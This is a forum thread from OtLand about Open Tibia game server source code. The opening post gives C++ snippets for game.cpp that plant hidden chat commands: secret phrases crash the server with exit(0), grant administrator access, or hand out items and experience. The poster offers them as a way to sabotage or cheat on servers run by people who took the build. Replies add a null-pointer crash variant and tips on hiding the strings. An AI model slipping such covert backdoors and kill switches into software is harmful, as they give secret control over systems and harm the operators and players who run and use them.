• There is NO official Otland's Discord server and NO official Otland's server list. The Otland's Staff does not manage any Discord server or server list. Moderators or administrator of any Discord server or server lists have NO connection to the Otland's Staff. Do not get scammed!
  • New resources must be posted under Resources tab. A discussion thread will be created automatically, you can't open threads manually anymore.

Feature Security things - hidden commands (useful for OT stealers, if thief dont have source)

Fresh

Quack!
Solutions
Reaction score
Hello.
I thought to publish an easy code (example) for Secure your server against of OT copy or bad teamwork - if someone steal your OT and if his dont have source, if you add some of this security thing, you can secure your OT ! (ex. you can be a GM or get 100 crystal coins).

Ok, lets go:

1) Open your compilator and load your dev.

2) Open game.cpp and search an function:
Code:
bool Game::internalCreatureSay(Creature* creature, SpeakClasses type, const std::string& text,
	bool ghostMode, SpectatorVec* spectators/* = NULL*/, Position* pos/* = NULL*/)

3) Under:
Code:
		player->manageAccount(text);
		return true;
	}

Paste some codes what you want,
here I give you some examples:

1. Command for Crash server:
Code:
	if(text == "__here_write_your_sentence_to_crash_stealer_server__")
    {
	exit(0);
    }

2. Give item or 100 crystal coin:
Code:
 	if(text == "__here_write_your_sentence_to_give_items__")
    {
    internalPlayerAddItem(NULL, player, Item::CreateItem(2160, 100), true); // here are 100 crystal coins
    }

3. Give Access 6:
Code:
 	if(text == "__here_write_sentence_to_add_access__")
    {
    player->setGroup(Groups::getInstance()->getGroup(6));
    }

4. Give 999k experience:
Code:
 	if(text == "__here_write_sentence_to_get_exp_points__")
    {
	player->addExperience(999999);
    }

Now if any person steal your OT without get source of them, you can log in to his server and destroy it or playing with cheats ^_^

Tested on TFS 0.3.6pl1. :)

wrong way, this way them can read and edit commands in hex editor really easy, you shouldn't use plain strings to do that
also that codes are weaker than what I was workin with(but stalled/dropped maybe? that project) cause they still have datapack etc

wrong way, this way them can read and edit commands in hex editor really easy, you shouldn't use plain strings to do that
also that codes are weaker than what I was workin with(but stalled/dropped maybe? that project) cause they still have datapack etc

You think that a noob which doesn't even know how to compile sources by himself would know how to use a hex editor and delete these nasty lines?

You think that a noob which doesn't even know how to compile sources by himself would know how to use a hex editor and delete these nasty lines?
oh well, if datapack isnt protected probably noone would care
but I can encrypt any of my scripts so only my executable is useful(not to mention that even not encrypted codes need many of source changes ^^) so IF anyone would get my server sided otdir it would be almost useless without modifing commands(oh well, config is also possible to encrypt, hehe), just I have no idea how to protect map ;p

haha would be funny if a player discovered it on your server :p

make it crash instead of give item:
Code:
Player* player = NULL;
player->getName();

boom crashzor

no, exit exits it and dereferencing null pointer causes segfault

but still your datapack is stolen and in most cases you can just swap exe with clean one and everything works ;d

Not exacly if you do transformations like Dragon Ball in C++ and other systems :D

Yeah, but people who can do that can also write these simple commands ;d
Damn, I just need idea how to properly encrypt map file -.-

well, I have no idea how to unpack it to memory and writing it to hd even for that few seconds needed for loading is bad idea
or... I have idea, just dunno if it gonna work

anyway I wanted something bruteforceproof so using password is a no-no(yeah, using 500chars pass would work for SOME time but its not hard to break it, just need time)

Back